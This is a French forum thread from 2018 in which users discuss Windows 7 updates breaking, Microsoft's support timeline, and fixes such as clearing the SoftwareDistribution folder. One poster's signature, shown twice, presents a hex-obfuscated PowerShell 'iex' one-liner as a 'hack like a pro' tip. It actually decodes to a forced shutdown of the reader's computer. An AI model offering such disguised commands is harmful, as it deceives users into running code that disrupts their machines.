Annonce

Réduire
Aucune annonce.

Windows 7 et ses mises à jour

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Windows 7 et ses mises à jour

    Bonjour à tous,

    Tachons d'égayer quelque peu ce forum en manque de messages (et surtout d'administrateurs ).

    J'ai hésité avant de poster ici ; à vrai dire, j'ai été proche de choisir "Lounge" mais bon... Il s'agit de Windows 7 après tout, même si au final c'est assez drôle.

    Y a-t-il beaucoup d'heureux utilisateurs de ce système d'exploitation qui se soucient d'avoir les dernières mises à jour ? Pas moi, en tout cas.

    Il y a deux jours, je ne sais pourquoi, j'ai lancé Windows Update. En fait si, je sais pourquoi. Cela a un rapport - quoique lointain - avec le sujet sur lequel je travaille actuellement.

    Et là, que vois-je ? Ca ne marche pas. Cela pédale puis crashe Explorer. Mince, me dis-je, c'est vrai que ça fait longtemps que je n'ai plus reçu de mise à jour. Pour être honnête, elles ne m'avaient pas manqué.

    Bref, j'essaie de réparer, de chercher sur le net mais sans succès. Puis, j'ai fini par trouver mais il m'a fallu remonter dans le temps. En fait, mon Windows update ne marche plus depuis décembre 2017 ! Idem concernant un autre poste chez moi.

    C'est alors que je me suis souvenu qu'une aventure tout à fait similaire m'était arrivée en 2015. Une sombre histoire d'agent Windows update qu'il fallait mettre à jour. Le truc, c'est que je suis resté des semaines, peut-être des mois, sans me rendre compte de rien.

    Alors je trouve que cela fait beaucoup d'erreurs de la part de Microsoft. Windows 10, pour sa part, n'a pas ce genre de problèmes. Cela en dit long sur la volonté de la firme de maintenir Windows 7.

    Je suis sûr et certain qu'il y a actuellement des milliers de machines sous Windows 7 qui ne sont plus à jour et ne le seront plus jamais. Une aubaine pour les malwares en tout genre et hackers du côté obscur.
    Dernière modification par Icarus, 13 avril 2018, 21h24.

  • #2
    C'est normal Windows 7 a été abandonné depuis un moment déjà. On a du mal à avancer et à aller vers Windows 10 car la transition 8 a eu un impact négatif dans la commu Windows. Mais le constat est le suivant il faut passer à la 10 ou mourir dans d'atroces souffrance (cheval de Troie, backdoor, malwares, ....) J'aurais voulu passer mon PC principal en UNIX mais j'ai des programmes qui nécessitent Windows (Illustrator, Photoshop,....) PAr contre mes deux autres pc sont sous Linux Debian depuis longtemps et franchement là c'est Top.

    Pour ce qui est des administrateurs, je pense que l'IRL est trop forte et a pris le dessus sur le forum. Beaucoup de forum sont crées par de jeunes étudiants puis petit à petit ils sont pris par des obligation (famille, travail, déplacements,....) et on les vois moins souvent ou plus du tout.

    Le forum n'a pas l'air si mort que cela puisque le noyau de la commu HK est présente dans les grands moments. Maintenant perso ayant choisis l'IRL également à ici ou ailleurs il est clair que je vient beaucoup moins souvent.

    Après, je parle pour moi,on fatigue avec les années,et venir pour parfois se prendre la tête avec des jeunes sur des sujets à deux francs, à 15ans je trollais, à 20 je remballais, à 30 je m'enflammais, à 40 je tolérais, à 50 ben maintenant je Zappe total.

    Mais sache que je lis perso, et je suis de temps en temps ce qui se passe sur HK, donc t'inquiète même si les admin ne sont pas là tu n'est pas tout seul

    Commentaire


    • #3
      Yo,

      C'est normal Windows 7 a été abandonné depuis un moment déjà.
      Non.
      Windows 7 est encore supporté par MS jusqu'au 14 janvier 2020, et heureusement vu le nombre de boites qui sont sous 7 et qui sont loin d'avoir l'ombre d'un projet de migration en tête. Donc c'est bien un "bug", les adeptes du complot diront que c'est calculé ^^ (mais pourquoi pas hein )

      Sinon pour ce qui est de la vie du fofo et de la commu HK en général, normal que certains s'orientent vers d'autres occupations ou s'essoufflent, on a tous autre chose à faire dans la vie. C'est juste dommage de pas passer le flambeau quand on sens qu'il commence à se faire trop lourd.
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Supporter mais pas renouveler d'où les BUG récurrents car les nouveaux systèmes attendent patiemment que l'utilisateur migre vers 10 normalement. Il n'y a pas de complotisme dans cela faut arrêter d'analyser les réponses des uns et des autres, on se croirait dans un émission télé avec Jacques réponse à tout.
        Windows 7, Service Pack 1* 13 janvier 2015 14 janvier 2020
        Donc tous n'est pas pris en charge car les développeurs ne mobilisent que les patch de sécu. Bref, soit tu migre vers 10 et là encore on s'habitue t'inquiète, soit tu persiste sachant qu'en 2020 les patch sécu seront aussi arrêté

        J'ai trouver pour ton soucis de mise à jour ce poste de MAlekal:
        http://www.commentcamarche.net/forum...e-dans-le-vide. Mais bon te donner de la peine pour encore deux ans enfin bref après tout

        Commentaire


        • #5
          Même si tu ne remercie qu'a moitié, je suis ravie d'avoir pu préciser ton propos DreAmuS. Je ne me risquerai surtout pas à dire que tu avais tort.
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

          Commentaire


          • #6
            DreAmuS voulait dire qu'on sent comme un abandon dans la mesure où peu de moyens semblent mobilisés pour Windows 7. Pour le reste, Microsoft est une société respectable qui est en accord avec ses déclarations puisque Windows 7 est toujours mis à jour. Par ailleurs, il est difficile de leur reprocher de privilégier leurs dernièrs produits.

            Toutefois, ces deux erreurs, à deux ans d'intervalle, ne sont pas anodines puisque l'une comme l'autre interdisent toute mise à jour jusqu'à intervention "manuelle" pour corriger le problème. Entre ceux, qui comme moi, n'y prêtent que peu d'attention et ceux qui sont incapables de réparer leur système, cela fait du monde. C'était sur ce point que je voulais attirer l'attention. Imaginez qu'une chose identique affecte Windows 10 et là, je suis pas loin de penser qu'ils dépêcheraient un technicien dans chaque foyer pour faire le correctif ou, plus réaliste, financeraient une lourde campagne médiatique pour avertir les gens.

            Cela dit, ce n'est pas arrivé sur Windows 10 et je gage que cela n'arrivera pas tant que ce sera le dernier système d'exploitation de la compagnie.

            Concernant les deux bugs que j'ai cités pour la mise à jour de Windows 7 (cela affecte Windows 8 aussi, il me semble), j'ai bien évidement réparé mon système dans les deux cas. Le lien que tu donnes, DreAmuS, concerne le souci de 2015... Un souci qui revient encore et encore puisqu'à chaque installation d'un Windows 7 à partir d'une image un peu vieille, l'agent de Windows update ne peut communiquer avec les serveurs. Donc, à chaque fois, il faut télécharger le correctif et l'installer pour bénéficier des mises à jour. Dans le genre lourd...

            Le plus récent bug est une erreur de date de péremption dans un fichier utilisé par Windows update. On ne peut bien évidemment pas modifier cette date manuellement car c'est signé numériquement par Microsoft. Cependant, il est assez facile de s'en sortir, soit en changeant la date du système (les correctifs s'installent puis on peut remettre la bonne date) soit en effaçant le contenu du répertoire Windows/SoftwareDistribution (préalable : arrêter le service Windows Update). Et si j'ai eu du mal à trouver la solution, c'est que les messages concernant cette affaire sur les forums datent de décembre 2017 / janvier 2018.

            S'agissant du trolling au sujet des systèmes exploitation, et si je peux donner mon point de vue : pour les tâches courantes je préfère Microsoft (XP, 7, 10, peu importe) car c'est moins prise de tête que tous les autres. Et c'est entre autres pour cela qu'ils sont N°1 chez le particulier. Après, dès qu'il s'agit de programmer, de bidouiller, je trouve que l'univers Microsoft est nébuleux, nauséabond parfois (cf. Common Object Model). Je m'y sens moins à l'aise que sous un UN*X même si j'ai bien plus d'expérience sous Windows.
            Dernière modification par Icarus, 15 avril 2018, 13h40.

            Commentaire


            • #7
              Pas de soucis Je me suis emballé , c'est l'âge qui fait ça les jeunes (j'approche la 50aine) Dreamus se fait vieux et c'est vrai que je me suis mal exprimer. Je souhaitais dire que les développeurs consacrent moins de temps sur 7 que 10 ce qui est normal. Du coup les Bugs vont se perpétuer.

              Je ne suis pas omnipotent et surtout je bosse dans le médicale donc l'info est derrière moi et vous qui êtes dedans ou en étude avait surement une avance sur moi. Pour ce qui est d'ici, remercions tout de même nos hôtes de laisser les ressources et le site viable pour les nouveaux arrivants.

              Perso, je suis plus sur les discords même si ça grouille de SK et Kikoos, on y trouve quelques perles ou anciens pour discuter un peu.

              Bises à vous deux les gars et Merci Krisskool pour ton intervention (PEace)

              Commentaire

              Chargement...
              X